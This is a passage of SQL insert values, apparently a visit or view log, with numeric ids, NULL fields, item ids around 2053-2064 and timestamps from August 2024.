(12787, NULL, NULL, 2059, 1, '2024-08-09 09:32:40'),
(12788, NULL, NULL, 2060, 1, '2024-08-09 09:32:42'),
(12789, NULL, NULL, 2061, 1, '2024-08-09 09:32:45'),
(12790, NULL, NULL, 2062, 1, '2024-08-09 09:32:47'),
(12791, NULL, NULL, 2063, 1, '2024-08-09 09:32:49'),
(12792, NULL, NULL, 2060, 1, '2024-08-09 11:31:05'),
(12793, NULL, NULL, 2054, 1, '2024-08-09 12:19:30'),
(12794, NULL, NULL, 2061, 1, '2024-08-09 12:40:12'),
(12795, NULL, NULL, 2061, 1, '2024-08-09 12:40:17'),
(12796, NULL, NULL, 2059, 1, '2024-08-09 13:25:02'),
(12797, NULL, NULL, 2063, 1, '2024-08-09 17:11:40'),
(12798, NULL, NULL, 2054, 1, '2024-08-09 19:22:43'),
(12799, NULL, NULL, 2062, 1, '2024-08-09 21:08:31'),
(12800, NULL, NULL, 2058, 1, '2024-08-09 21:09:35'),
(12801, NULL, NULL, 2060, 1, '2024-08-09 23:15:18'),
(12802, NULL, NULL, 2061, 1, '2024-08-10 00:08:07'),
(12803, NULL, NULL, 2058, 1, '2024-08-10 00:10:52'),
(12804, NULL, NULL, 2058, 1, '2024-08-10 04:02:02'),
(12805, NULL, NULL, 2058, 1, '2024-08-10 05:08:52'),
(12806, NULL, NULL, 2054, 1, '2024-08-10 11:00:04'),
(12807, NULL, NULL, 2055, 1, '2024-08-10 20:33:22'),
(12808, NULL, NULL, 2064, 1, '2024-08-10 22:34:58'),
(12809, NULL, NULL, 2058, 1, '2024-08-10 23:51:11'),
(12810, NULL, NULL, 2054, 1, '2024-08-11 00:44:00'),
(12811, NULL, NULL, 2061, 1, '2024-08-11 07:30:23'),
(12812, NULL, NULL, 2053, 1, '2024-08-11 09:20:10'),
(12813, NULL, NULL, 2064, 1, '2024-08-11 10:51:41'),
(12814, NULL, NULL, 2054, 1, '2024-08-11 12:59:09'),
(12815, NULL, NULL, 2063, 1, '2024-08-11 13:28:54'),
(12816, NULL, NULL, 2053, 1, '2024-08-11 13:51:52'),
(12817, NULL, NULL, 2059, 1, '2024-08-11 17:06:57'),
(12818, NULL, NULL, 2054, 1, '2024-08-11 18:52:51'),
(12819, NULL, NULL, 2059, 1, '2024-08-11 19:53:05'),
(12820, NULL, NULL, 2054, 1, '2024-08-12 00:16:03'),
(12821, NULL, NULL, 2061, 1, '2024-08-12 01:52:59'),
(12822, NULL, NULL, 2053, 1, '2024-08-12 08:48:17'),
(12823, NULL, NULL, 2064, 1, '2024-08-12 11:29:23'),
(12824, NULL, NULL, 2054, 1, '2024-08-12 12:23:25'),
(12825, NULL, NULL, 2060, 1, '2024-08-12 12:49:50'),
(12826, NULL, NULL, 2061, 1, '2024-08-12 13:19:44'),
(12827, NULL, NULL, 2059, 1, '2024-08-12 14:12:57'),
(12828, NULL, NULL, 2064, 1, '2024-08-12 14:52:10'),
(12829, NULL, NULL, 2062, 1, '2024-08-12 15:26:50'),
(12830, NULL, NULL, 2055, 1, '2024-08-12 16:22:54'),
(12831, NULL, NULL, 2054, 1, '2024-08-12 17:20:42'),
(12832, NULL, NULL, 2054, 1, '2024-08-12 17:22:00'),
(12833, NULL, NULL, 2054, 1, '2024-08-12 18:02:12'),
(12834, NULL, NULL, 2064, 1, '2024-08-12 18:48:50'),
(12835, NULL, NULL, 2064, 1, '2024-08-12 18:48:52'),
(12836, NULL, NULL, 2064, 1, '2024-08-12 18:48:53'),
(12837, NULL, NULL, 2060, 1, '2024-08-12 18:56:09'),
(12838, NULL, NULL, 2061, 1, '2024-08-12 19:56:22'),
(12839, NULL, NULL, 2054, 1, '2024-08-12 20:22:18'),
(12840, NULL, NULL, 2054, 1, '2024-08-12 20:48:45'),
(12841, NULL, NULL, 2060, 1, '2024-08-12 21:12:28'),
(12842, NULL, NULL, 2061, 1, '2024-08-12 21:40:35'),
(12843, NULL, NULL, 2059, 1, '2024-08-12 22:31:16'),
(12844, NULL, NULL, 2054, 1, '2024-08-12 23:26:23'),
(12845, NULL, NULL, 2060, 1, '2024-08-12 23:51:39'),
(12846, NULL, NULL, 2054, 1, '2024-08-13 00:00:53'),
(12847, NULL, NULL, 2061, 1, '2024-08-13 00:20:52'),
(12848, NULL, NULL, 2059, 1, '2024-08-13 01:11:03'),
(12849, NULL, NULL, 2054, 1, '2024-08-13 01:39:56'),
(12850, NULL, NULL, 2060, 1, '2024-08-13 02:05:19'),
(12851, NULL, NULL, 2061, 1, '2024-08-13 02:33:40'),
(12852, NULL, NULL, 2059, 1, '2024-08-13 03:22:05'),
(12853, NULL, NULL, 2062, 1, '2024-08-13 03:35:09'),
(12854, NULL, NULL, 2058, 1, '2024-08-13 03:35:11'),
(12855, NULL, NULL, 2059, 1, '2024-08-13 03:35:17'),
(12856, NULL, NULL, 2064, 1, '2024-08-13 03:35:20'),
(12857, NULL, NULL, 2063, 1, '2024-08-13 03:35:22'),
(12858, NULL, NULL, 2062, 1, '2024-08-13 03:35:24'),
(12859, NULL, NULL, 2061, 1, '2024-08-13 03:35:26'),
(12860, NULL, NULL, 2060, 1, '2024-08-13 03:35:27'),
(12861, NULL, NULL, 2059, 1, '2024-08-13 03:35:29'),
(12862, NULL, NULL, 2058, 1, '2024-08-13 03:35:31'),
(12863, NULL, NULL, 2055, 1, '2024-08-13 03:35:33'),
(12864, NULL, NULL, 2054, 1, '2024-08-13 03:35:34'),
(12865, NULL, NULL, 2053, 1, '2024-08-13 03:35:36'),
(12866, NULL, NULL, 2055, 1, '2024-08-13 03:35:41'),
(12867, NULL, NULL, 2064, 1, '2024-08-13 03:35:43'),
(12868, NULL, NULL, 2058, 1, '2024-08-13 03:35:45'),
(12869, NULL, NULL, 2059, 1, '2024-08-13 03:35:46'),
(12870, NULL, NULL, 2060, 1, '2024-08-13 03:35:48'),
(12871, NULL, NULL, 2061, 1, '2024-08-13 03:35:50'),
(12872, NULL, NULL, 2062, 1, '2024-08-13 03:35:52'),
(12873, NULL, NULL, 2063, 1, '2024-08-13 03:35:53'),
(12874, NULL, NULL, 2061, 1, '2024-08-13 03:35:55'),
(12875, NULL, NULL, 2054, 1, '2024-08-13 03:35:57'),
(12876, NULL, NULL, 2064, 1, '2024-08-13 03:36:00'),
(12877, NULL, NULL, 2063, 1, '2024-08-13 03:36:03'),
(12878, NULL, NULL, 2062, 1, '2024-08-13 03:36:04'),
(12879, NULL, NULL, 2061, 1, '2024-08-13 03:36:06'),
(12880, NULL, NULL, 2060, 1, '2024-08-13 03:36:08'),
(12881, NULL, NULL, 2060, 1, '2024-08-13 03:36:10'),
(12882, NULL, NULL, 2063, 1, '2024-08-13 03:36:11'),
(12883, NULL, NULL, 2064, 1, '2024-08-13 03:36:16'),
(12884, NULL, NULL, 2058, 1, '2024-08-13 03:36:18'),
(12885, NULL, NULL, 2059, 1, '2024-08-13 03:36:19'),
(12886, NULL, NULL, 2060, 1, '2024-08-13 03:36:21'),
(12887, NULL, NULL, 2061, 1, '2024-08-13 03:36:23'),
(12888, NULL, NULL, 2062, 1, '2024-08-13 03:36:25'),
(12889, NULL, NULL, 2063, 1, '2024-08-13 03:36:26'),
(12890, NULL, NULL, 2064, 1, '2024-08-13 03:36:31'),
(12891, NULL, NULL, 2063, 1, '2024-08-13 03:36:33'),
(12892, NULL, NULL, 2062, 1, '2024-08-13 03:36:34'),
(12893, NULL, NULL, 2061, 1, '2024-08-13 03:36:36'),
(12894, NULL, NULL, 2060, 1, '2024-08-13 03:36:38'),
(12895, NULL, NULL, 2059, 1, '2024-08-13 03:36:39'),
(12896, NULL, NULL, 2058, 1, '2024-08-13 03:36:41'),
(12897, NULL, NULL, 2055, 1, '2024-08-13 03:36:43'),
(12898, NULL, NULL, 2054, 1, '2024-08-13 03:36:45'),
(12899, NULL, NULL, 2064, 1, '2024-08-13 03:36:49'),
(12900, NULL, NULL, 2058, 1, '2024-08-13 03:36:51'),
(12901, NULL, NULL, 2059, 1, '2024-08-13 03:36:53'),
(12902, NULL, NULL, 2060, 1, '2024-08-13 03:36:54'),
(12903, NULL, NULL, 2061, 1, '2024-08-13 03:36:56'),
(12904, NULL, NULL, 2062, 1, '2024-08-13 03:36:58'),
(12905, NULL, NULL, 2063, 1, '2024-08-13 03:37:00'),
(12906, NULL, NULL, 2064, 1, '2024-08-13 03:37:07'),
(12907, NULL, NULL, 2063, 1, '2024-08-13 03:37:09'),
(12908, NULL, NULL, 2062, 1, '2024-08-13 03:37:11'),
(12909, NULL, NULL, 2061, 1, '2024-08-13 03:37:13'),
(12910, NULL, NULL, 2060, 1, '2024-08-13 03:37:14'),
(12911, NULL, NULL, 2059, 1, '2024-08-13 03:37:16'),
(12912, NULL, NULL, 2058, 1, '2024-08-13 03:37:18'),
(12913, NULL, NULL, 2055, 1, '2024-08-13 03:37:20'),
(12914, NULL, NULL, 2054, 1, '2024-08-13 03:37:21'),
(12915, NULL, NULL, 2064, 1, '2024-08-13 03:59:18'),
(12916, NULL, NULL, 2062, 1, '2024-08-13 04:34:56'),
(12917, NULL, NULL, 2055, 1, '2024-08-13 05:30:24'),
(12918, NULL, NULL, 2054, 1, '2024-08-13 05:40:25'),
(12919, NULL, NULL, 2064, 1, '2024-08-13 06:02:41'),
(12920, NULL, NULL, 2063, 1, '2024-08-13 06:18:08'),
(12921, NULL, NULL, 2058, 1, '2024-08-13 06:32:04'),
(12922, NULL, NULL, 2059, 1, '2024-08-13 11:45:15'),
(12923, NULL, NULL, 2062, 1, '2024-08-14 00:21:03'),
(12924, NULL, NULL, 2064, 1, '2024-08-14 00:21:07'),
(12925, NULL, NULL, 2060, 1, '2024-08-14 00:21:11'),
(12926, NULL, NULL, 2054, 1, '2024-08-14 00:21:13'),
(12927, NULL, NULL, 2064, 1, '2024-08-14 00:21:16'),
(12928, NULL, NULL, 2063, 1, '2024-08-14 00:21:19'),
(12929, NULL, NULL, 2062, 1, '2024-08-14 00:21:21'),
(12930, NULL, NULL, 2061, 1, '2024-08-14 00:21:23'),
(12931, NULL, NULL, 2060, 1, '2024-08-14 00:21:25'),
(12932, NULL, NULL, 2064, 1, '2024-08-14 00:21:31'),
(12933, NULL, NULL, 2063, 1, '2024-08-14 00:21:33'),
(12934, NULL, NULL, 2062, 1, '2024-08-14 00:21:35'),
(12935, NULL, NULL, 2061, 1, '2024-08-14 00:21:37'),
(12936, NULL, NULL, 2060, 1, '2024-08-14 00:21:40'),
(12937, NULL, NULL, 2059, 1, '2024-08-14 00:21:42'),
(12938, NULL, NULL, 2058, 1, '2024-08-14 00:21:44'),
(12939, NULL, NULL, 2055, 1, '2024-08-14 00:21:46'),
(12940, NULL, NULL, 2054, 1, '2024-08-14 00:21:48'),
(12941, NULL, NULL, 2053, 1, '2024-08-14 00:21:49'),
(12942, NULL, NULL, 2061, 1, '2024-08-14 00:21:53'),
(12943, NULL, NULL, 2059, 1, '2024-08-14 00:21:55'),
(12944, NULL, NULL, 2058, 1, '2024-08-14 00:21:57'),
(12945, NULL, NULL, 2054, 1, '2024-08-14 00:21:59'),
(12946, NULL, NULL, 2063, 1, '2024-08-14 00:22:03'),
(12947, NULL, NULL, 2059, 1, '2024-08-14 00:22:05'),
(12948, NULL, NULL, 2058, 1, '2024-08-14 00:22:06'),
(12949, NULL, NULL, 2055, 1, '2024-08-14 00:22:08'),
(12950, NULL, NULL, 2061, 1, '2024-08-14 00:22:10'),
(12951, NULL, NULL, 2064, 1, '2024-08-14 00:22:15'),
(12952, NULL, NULL, 2063, 1, '2024-08-14 00:22:17'),
(12953, NULL, NULL, 2062, 1, '2024-08-14 00:22:19'),
(12954, NULL, NULL, 2061, 1, '2024-08-14 00:22:21'),
(12955, NULL, NULL, 2060, 1, '2024-08-14 00:22:23'),
(12956, NULL, NULL, 2059, 1, '2024-08-14 00:22:25'),
(12957, NULL, NULL, 2058, 1, '2024-08-14 00:22:27'),
(12958, NULL, NULL, 2055, 1, '2024-08-14 00:22:28'),
(12959, NULL, NULL, 2054, 1, '2024-08-14 00:22:30'),
(12960, NULL, NULL, 2064, 1, '2024-08-14 00:22:33'),
(12961, NULL, NULL, 2058, 1, '2024-08-14 00:22:35'),
(12962, NULL, NULL, 2059, 1, '2024-08-14 00:22:37'),
(12963, NULL, NULL, 2060, 1, '2024-08-14 00:22:38'),
(12964, NULL, NULL, 2061, 1, '2024-08-14 00:22:40'),
(12965, NULL, NULL, 2062, 1, '2024-08-14 00:22:42'),
(12966, NULL, NULL, 2063, 1, '2024-08-14 00:22:44'),
(12967, NULL, NULL, 2064, 1, '2024-08-14 00:22:49'),
(12968, NULL, NULL, 2063, 1, '2024-08-14 00:22:51'),
(12969, NULL, NULL, 2062, 1, '2024-08-14 00:22:52'),
(12970, NULL, NULL, 2061, 1, '2024-08-14 00:22:55'),
(12971, NULL, NULL, 2060, 1, '2024-08-14 00:22:56'),
(12972, NULL, NULL, 2059, 1, '2024-08-14 00:22:58'),
(12973, NULL, NULL, 2058, 1, '2024-08-14 00:23:00'),
(12974, NULL, NULL, 2055, 1, '2024-08-14 00:23:02'),
(12975, NULL, NULL, 2054, 1, '2024-08-14 00:23:04'),
(12976, NULL, NULL, 2064, 1, '2024-08-14 00:23:06'),
(12977, NULL, NULL, 2058, 1, '2024-08-14 00:23:07'),
(12978, NULL, NULL, 2059, 1, '2024-08-14 00:23:09'),
(12979, NULL, NULL, 2060, 1, '2024-08-14 00:23:11'),
(12980, NULL, NULL, 2061, 1, '2024-08-14 00:23:13'),
(12981, NULL, NULL, 2062, 1, '2024-08-14 00:23:15'),
(12982, NULL, NULL, 2063, 1, '2024-08-14 00:23:17'),
(12983, NULL, NULL, 2059, 1, '2024-08-14 04:15:49'),
(12984, NULL, NULL, 2062, 1, '2024-08-14 09:25:10'),
(12985, NULL, NULL, 2063, 1, '2024-08-14 12:02:26'),
(12986, NULL, NULL, 2064, 1, '2024-08-14 12:02:31'),
(12987, NULL, NULL, 2060, 1, '2024-08-14 13:19:08'),
(12988, NULL, NULL, 2054, 1, '2024-08-14 13:39:52'),
(12989, NULL, NULL, 2059, 1, '2024-08-14 20:04:17'),
(12990, NULL, NULL, 2059, 1, '2024-08-15 01:17:14'),
(12991, NULL, NULL, 2064, 1, '2024-08-15 05:30:57'),
(12992, NULL, NULL, 2058, 1, '2024-08-15 06:19:18'),
(12993, NULL, NULL, 2064, 1, '2024-08-15 06:19:54'),
(12994, NULL, NULL, 2063, 1, '2024-08-15 06:20:04'),
(12995, NULL, NULL, 2062, 1, '2024-08-15 06:20:12'),
(12996, NULL, NULL, 2061, 1, '2024-08-15 06:20:19'),
(12997, NULL, NULL, 2060, 1, '2024-08-15 06:20:26'),
(12998, NULL, NULL, 2059, 1, '2024-08-15 06:20:34'),
(12999, NULL, NULL, 2058, 1, '2024-08-15 06:20:41'),
(13000, NULL, NULL, 2055, 1, '2024-08-15 06:20:49'),
(13001, NULL, NULL, 2054, 1, '2024-08-15 06:20:56'),
(13002, NULL, NULL, 2053, 1, '2024-08-15 06:21:03'),
(13003, NULL, NULL, 2064, 1, '2024-08-15 06:21:19'),
(13004, NULL, NULL, 2061, 1, '2024-08-15 06:21:27'),
(13005, NULL, NULL, 2058, 1, '2024-08-15 06:21:35'),
(13006, NULL, NULL, 2055, 1, '2024-08-15 06:21:42'),
(13007, NULL, NULL, 2054, 1, '2024-08-15 06:21:51'),
(13008, NULL, NULL, 2060, 1, '2024-08-15 06:21:57'),
(13009, NULL, NULL, 2062, 1, '2024-08-15 06:22:12'),
(13010, NULL, NULL, 2055, 1, '2024-08-15 06:22:19'),
(13011, NULL, NULL, 2064, 1, '2024-08-15 06:22:35'),
(13012, NULL, NULL, 2058, 1, '2024-08-15 06:22:44'),
(13013, NULL, NULL, 2059, 1, '2024-08-15 06:22:51'),
(13014, NULL, NULL, 2060, 1, '2024-08-15 06:22:59'),
(13015, NULL, NULL, 2061, 1, '2024-08-15 06:23:06'),
(13016, NULL, NULL, 2062, 1, '2024-08-15 06:23:13'),
(13017, NULL, NULL, 2063, 1, '2024-08-15 06:23:20'),
(13018, NULL, NULL, 2063, 1, '2024-08-15 06:23:27'),
(13019, NULL, NULL, 2059, 1, '2024-08-15 06:23:34'),
(13020, NULL, NULL, 2061, 1, '2024-08-15 06:23:42'),
(13021, NULL, NULL, 2064, 1, '2024-08-15 06:24:03'),
(13022, NULL, NULL, 2063, 1, '2024-08-15 06:24:11'),
(13023, NULL, NULL, 2062, 1, '2024-08-15 06:24:17'),
(13024, NULL, NULL, 2061, 1, '2024-08-15 06:24:26'),
(13025, NULL, NULL, 2060, 1, '2024-08-15 06:24:35'),
(13026, NULL, NULL, 2059, 1, '2024-08-15 06:24:45'),
(13027, NULL, NULL, 2058, 1, '2024-08-15 06:24:52'),
(13028, NULL, NULL, 2055, 1, '2024-08-15 06:24:59'),
(13029, NULL, NULL, 2054, 1, '2024-08-15 06:25:06'),
(13030, NULL, NULL, 2064, 1, '2024-08-15 06:25:24'),
(13031, NULL, NULL, 2058, 1, '2024-08-15 06:25:33'),
(13032, NULL, NULL, 2059, 1, '2024-08-15 06:25:39'),
(13033, NULL, NULL, 2060, 1, '2024-08-15 06:25:46'),
(13034, NULL, NULL, 2061, 1, '2024-08-15 06:25:53'),
(13035, NULL, NULL, 2062, 1, '2024-08-15 06:26:00'),
(13036, NULL, NULL, 2063, 1, '2024-08-15 06:26:08'),
(13037, NULL, NULL, 2064, 1, '2024-08-15 06:26:31'),
(13038, NULL, NULL, 2058, 1, '2024-08-15 06:26:41'),
(13039, NULL, NULL, 2059, 1, '2024-08-15 06:26:51'),
(13040, NULL, NULL, 2060, 1, '2024-08-15 06:26:59'),
(13041, NULL, NULL, 2061, 1, '2024-08-15 06:27:10'),
(13042, NULL, NULL, 2062, 1, '2024-08-15 06:27:19'),
(13043, NULL, NULL, 2063, 1, '2024-08-15 06:27:27'),
(13044, NULL, NULL, 2064, 1, '2024-08-15 06:27:54'),
(13045, NULL, NULL, 2063, 1, '2024-08-15 06:28:04'),
(13046, NULL, NULL, 2062, 1, '2024-08-15 06:28:13'),
(13047, NULL, NULL, 2061, 1, '2024-08-15 06:28:22'),
(13048, NULL, NULL, 2060, 1, '2024-08-15 06:28:30'),
(13049, NULL, NULL, 2059, 1, '2024-08-15 06:28:37'),
(13050, NULL, NULL, 2058, 1, '2024-08-15 06:28:45'),
(13051, NULL, NULL, 2055, 1, '2024-08-15 06:28:53'),
(13052, NULL, NULL, 2054, 1, '2024-08-15 06:29:00'),
(13053, NULL, NULL, 2063, 1, '2024-08-15 07:15:56'),
(13054, NULL, NULL, 2061, 1, '2024-08-15 11:37:45'),
(13055, NULL, NULL, 2060, 1, '2024-08-15 16:51:24'),
(13056, NULL, NULL, 2060, 1, '2024-08-15 20:43:09'),
(13057, NULL, NULL, 2055, 1, '2024-08-15 21:31:36'),
(13058, NULL, NULL, 2058, 1, '2024-08-16 00:25:51'),
(13059, NULL, NULL, 2062, 1, '2024-08-16 04:23:23'),
(13060, NULL, NULL, 2054, 1, '2024-08-16 13:14:22'),
(13061, NULL, NULL, 2059, 1, '2024-08-16 17:02:47'),
(13062, NULL, NULL, 2055, 1, '2024-08-16 17:42:52'),
(13063, NULL, NULL, 2064, 1, '2024-08-17 01:34:54'),
(13064, NULL, NULL, 2058, 1, '2024-08-17 04:27:49'),
(13065, NULL, NULL, 2055, 1, '2024-08-17 04:28:28'),
(13066, NULL, NULL, 2064, 1, '2024-08-17 05:47:52'),
(13067, NULL, NULL, 2059, 1, '2024-08-17 08:17:57'),
(13068, NULL, NULL, 2062, 1, '2024-08-17 11:22:49'),
(13069, NULL, NULL, 2058, 1, '2024-08-17 11:33:30'),
(13070, NULL, NULL, 2058, 1, '2024-08-17 12:18:22'),
(13071, NULL, NULL, 2061, 1, '2024-08-17 17:23:29'),
(13072, NULL, NULL, 2061, 1, '2024-08-17 17:33:19'),
(13073, NULL, NULL, 2061, 1, '2024-08-17 23:39:32'),
(13074, NULL, NULL, 2064, 1, '2024-08-18 04:43:52'),
(13075, NULL, NULL, 2054, 1, '2024-08-18 06:48:57'),
(13076, NULL, NULL, 2062, 1, '2024-08-18 09:37:15'),
(13077, NULL, NULL, 2063, 1, '2024-08-18 14:42:21'),
(13078, NULL, NULL, 2064, 1, '2024-08-18 18:17:57'),
(13079, NULL, NULL, 2060, 1, '2024-08-18 19:34:08'),
(13080, NULL, NULL, 2063, 1, '2024-08-18 23:25:36'),
(13081, NULL, NULL, 2055, 1, '2024-08-19 05:05:06'),
(13082, NULL, NULL, 2061, 1, '2024-08-19 06:01:16'),
(13083, NULL, NULL, 2054, 1, '2024-08-19 07:07:02'),
(13084, NULL, NULL, 2060, 1, '2024-08-19 10:21:06'),
(13085, NULL, NULL, 2058, 1, '2024-08-19 10:54:26'),
(13086, NULL, NULL, 2058, 1, '2024-08-19 13:30:12'),
(13087, NULL, NULL, 2053, 1, '2024-08-19 13:30:15'),
(13088, NULL, NULL, 2061, 1, '2024-08-19 14:02:41'),
(13089, NULL, NULL, 2064, 1, '2024-08-19 18:32:55'),
(13090, NULL, NULL, 2059, 1, '2024-08-19 18:33:07'),
(13091, NULL, NULL, 2055, 1, '2024-08-19 18:33:16'),
(13092, NULL, NULL, 2064, 1, '2024-08-19 18:33:43'),
(13093, NULL, NULL, 2063, 1, '2024-08-19 18:33:54'),
(13094, NULL, NULL, 2062, 1, '2024-08-19 18:34:02'),
(13095, NULL, NULL, 2061, 1, '2024-08-19 18:34:11'),
(13096, NULL, NULL, 2060, 1, '2024-08-19 18:34:19'),
(13097, NULL, NULL, 2064, 1, '2024-08-19 18:34:37'),
(13098, NULL, NULL, 2061, 1, '2024-08-19 18:34:49'),
(13099, NULL, NULL, 2058, 1, '2024-08-19 18:34:57'),
(13100, NULL, NULL, 2055, 1, '2024-08-19 18:35:06'),
(13101, NULL, NULL, 2058, 1, '2024-08-19 18:35:23'),
(13102, NULL, NULL, 2061, 1, '2024-08-19 18:35:31'),
(13103, NULL, NULL, 2054, 1, '2024-08-19 18:35:45'),
(13104, NULL, NULL, 2063, 1, '2024-08-19 18:35:52'),
(13105, NULL, NULL, 2060, 1, '2024-08-19 18:36:00'),
(13106, NULL, NULL, 2064, 1, '2024-08-19 18:36:19'),
(13107, NULL, NULL, 2063, 1, '2024-08-19 18:36:30'),
(13108, NULL, NULL, 2062, 1, '2024-08-19 18:36:37'),
(13109, NULL, NULL, 2061, 1, '2024-08-19 18:36:45'),
(13110, NULL, NULL, 2060, 1, '2024-08-19 18:36:54'),
(13111, NULL, NULL, 2059, 1, '2024-08-19 18:37:03'),
(13112, NULL, NULL, 2058, 1, '2024-08-19 18:37:10'),
(13113, NULL, NULL, 2055, 1, '2024-08-19 18:37:18'),
(13114, NULL, NULL, 2054, 1, '2024-08-19 18:37:27'),
(13115, NULL, NULL, 2053, 1, '2024-08-19 18:37:35'),
(13116, NULL, NULL, 2062, 1, '2024-08-19 18:37:57'),
(13117, NULL, NULL, 2064, 1, '2024-08-19 18:38:06'),
(13118, NULL, NULL, 2058, 1, '2024-08-19 18:38:15'),
(13119, NULL, NULL, 2059, 1, '2024-08-19 18:38:24'),
(13120, NULL, NULL, 2060, 1, '2024-08-19 18:38:31'),
(13121, NULL, NULL, 2061, 1, '2024-08-19 18:38:39'),
(13122, NULL, NULL, 2062, 1, '2024-08-19 18:38:47'),
(13123, NULL, NULL, 2063, 1, '2024-08-19 18:38:55'),
(13124, NULL, NULL, 2064, 1, '2024-08-19 18:39:40'),
(13125, NULL, NULL, 2063, 1, '2024-08-19 18:39:49'),
(13126, NULL, NULL, 2062, 1, '2024-08-19 18:39:57'),
(13127, NULL, NULL, 2061, 1, '2024-08-19 18:40:04'),
(13128, NULL, NULL, 2060, 1, '2024-08-19 18:40:11'),
(13129, NULL, NULL, 2059, 1, '2024-08-19 18:40:20'),
(13130, NULL, NULL, 2058, 1, '2024-08-19 18:40:27'),
(13131, NULL, NULL, 2055, 1, '2024-08-19 18:40:34'),
(13132, NULL, NULL, 2054, 1, '2024-08-19 18:40:42'),
(13133, NULL, NULL, 2064, 1, '2024-08-19 18:40:58'),
(13134, NULL, NULL, 2058, 1, '2024-08-19 18:41:07'),
(13135, NULL, NULL, 2059, 1, '2024-08-19 18:41:15'),
(13136, NULL, NULL, 2060, 1, '2024-08-19 18:41:22'),
(13137, NULL, NULL, 2061, 1, '2024-08-19 18:41:29'),
(13138, NULL, NULL, 2062, 1, '2024-08-19 18:41:37'),
(13139, NULL, NULL, 2063, 1, '2024-08-19 18:41:44'),
(13140, NULL, NULL, 2064, 1, '2024-08-19 18:42:14'),
(13141, NULL, NULL, 2063, 1, '2024-08-19 18:42:23'),
(13142, NULL, NULL, 2062, 1, '2024-08-19 18:42:30'),
(13143, NULL, NULL, 2061, 1, '2024-08-19 18:42:38'),
(13144, NULL, NULL, 2060, 1, '2024-08-19 18:42:45'),
(13145, NULL, NULL, 2059, 1, '2024-08-19 18:42:52'),
(13146, NULL, NULL, 2058, 1, '2024-08-19 18:43:00'),
(13147, NULL, NULL, 2055, 1, '2024-08-19 18:43:08'),
(13148, NULL, NULL, 2054, 1, '2024-08-19 18:43:15'),
(13149, NULL, NULL, 2064, 1, '2024-08-19 18:51:24'),
(13150, NULL, NULL, 2064, 1, '2024-08-19 18:51:25'),
(13151, NULL, NULL, 2058, 1, '2024-08-19 19:12:41'),
(13152, NULL, NULL, 2054, 1, '2024-08-19 21:06:36'),
(13153, NULL, NULL, 2061, 1, '2024-08-20 04:19:25'),
(13154, NULL, NULL, 2054, 1, '2024-08-20 05:09:17'),
(13155, NULL, NULL, 2062, 1, '2024-08-20 06:11:08'),
(13156, NULL, NULL, 2062, 1, '2024-08-20 06:11:11'),
(13157, NULL, NULL, 2062, 1, '2024-08-20 06:11:15'),
(13158, NULL, NULL, 2054, 1, '2024-08-20 07:30:24'),
(13159, NULL, NULL, 2054, 1, '2024-08-20 08:34:34'),
(13160, NULL, NULL, 2054, 1, '2024-08-20 12:12:54'),
(13161, NULL, NULL, 2064, 1, '2024-08-20 17:38:16'),
(13162, NULL, NULL, 2054, 1, '2024-08-20 19:20:30'),
(13163, NULL, NULL, 2054, 1, '2024-08-20 19:20:30'),
(13164, NULL, NULL, 2054, 1, '2024-08-20 21:41:36'),
(13165, NULL, NULL, 2060, 1, '2024-08-20 23:34:05'),
(13166, NULL, NULL, 2062, 1, '2024-08-21 00:10:23'),
(13167, NULL, NULL, 2063, 1, '2024-08-21 02:57:59'),
(13168, NULL, NULL, 2058, 1, '2024-08-21 04:07:01'),
(13169, NULL, NULL, 2054, 1, '2024-08-21 06:58:35'),
(13170, NULL, NULL, 2062, 1, '2024-08-21 09:22:05'),
(13171, NULL, NULL, 2064, 1, '2024-08-21 13:52:49'),
(13172, NULL, NULL, 2063, 1, '2024-08-21 14:47:44'),
(13173, NULL, NULL, 2054, 1, '2024-08-21 19:00:17'),
(13174, NULL, NULL, 2060, 1, '2024-08-21 19:15:44'),
(13175, NULL, NULL, 2063, 1, '2024-08-21 19:27:38'),
(13176, NULL, NULL, 2058, 1, '2024-08-21 19:57:39'),
(13177, NULL, NULL, 2055, 1, '2024-08-21 20:47:16'),
(13178, NULL, NULL, 2058, 1, '2024-08-21 21:11:50'),
(13179, NULL, NULL, 2061, 1, '2024-08-21 22:14:10'),
(13180, NULL, NULL, 2062, 1, '2024-08-21 23:14:44'),
(13181, NULL, NULL, 2054, 1, '2024-08-22 00:59:42'),
(13182, NULL, NULL, 2059, 1, '2024-08-22 01:15:04'),
(13183, NULL, NULL, 2059, 1, '2024-08-22 01:20:51'),
(13184, NULL, NULL, 2064, 1, '2024-08-22 01:39:16'),
(13185, NULL, NULL, 2055, 1, '2024-08-22 04:47:42'),
(13186, NULL, NULL, 2058, 1, '2024-08-22 05:32:05'),
(13187, NULL, NULL, 2060, 1, '2024-08-22 06:31:48'),
(13188, NULL, NULL, 2063, 1, '2024-08-22 06:31:52'),
(13189, NULL, NULL, 2058, 1, '2024-08-22 06:31:54'),
(13190, NULL, NULL, 2055, 1, '2024-08-22 06:31:58'),
(13191, NULL, NULL, 2061, 1, '2024-08-22 06:32:05'),
(13192, NULL, NULL, 2062, 1, '2024-08-22 06:32:10'),
(13193, NULL, NULL, 2054, 1, '2024-08-22 06:35:17'),
(13194, NULL, NULL, 2059, 1, '2024-08-22 06:36:00'),
(13195, NULL, NULL, 2064, 1, '2024-08-22 07:45:44'),
(13196, NULL, NULL, 2054, 1, '2024-08-22 08:36:58'),
(13197, NULL, NULL, 2060, 1, '2024-08-22 09:10:24'),
(13198, NULL, NULL, 2063, 1, '2024-08-22 09:10:26'),
(13199, NULL, NULL, 2058, 1, '2024-08-22 09:10:29'),
(13200, NULL, NULL, 2055, 1, '2024-08-22 09:10:33'),
(13201, NULL, NULL, 2061, 1, '2024-08-22 09:10:39'),
(13202, NULL, NULL, 2062, 1, '2024-08-22 09:10:59'),
(13203, NULL, NULL, 2054, 1, '2024-08-22 09:14:57'),
(13204, NULL, NULL, 2059, 1, '2024-08-22 09:15:47'),
(13205, NULL, NULL, 2064, 1, '2024-08-22 09:16:25'),
(13206, NULL, NULL, 2060, 1, '2024-08-22 15:41:12'),
(13207, NULL, NULL, 2060, 1, '2024-08-22 16:38:06'),
(13208, NULL, NULL, 2063, 1, '2024-08-22 16:57:02'),
(13209, NULL, NULL, 2058, 1, '2024-08-22 17:44:27'),
(13210, NULL, NULL, 2055, 1, '2024-08-22 19:06:09'),
(13211, NULL, NULL, 2058, 1, '2024-08-22 21:23:16'),
(13212, NULL, NULL, 2061, 1, '2024-08-22 21:26:46'),
(13213, NULL, NULL, 2054, 1, '2024-08-22 21:59:16'),
(13214, NULL, NULL, 2064, 1, '2024-08-22 22:09:05'),
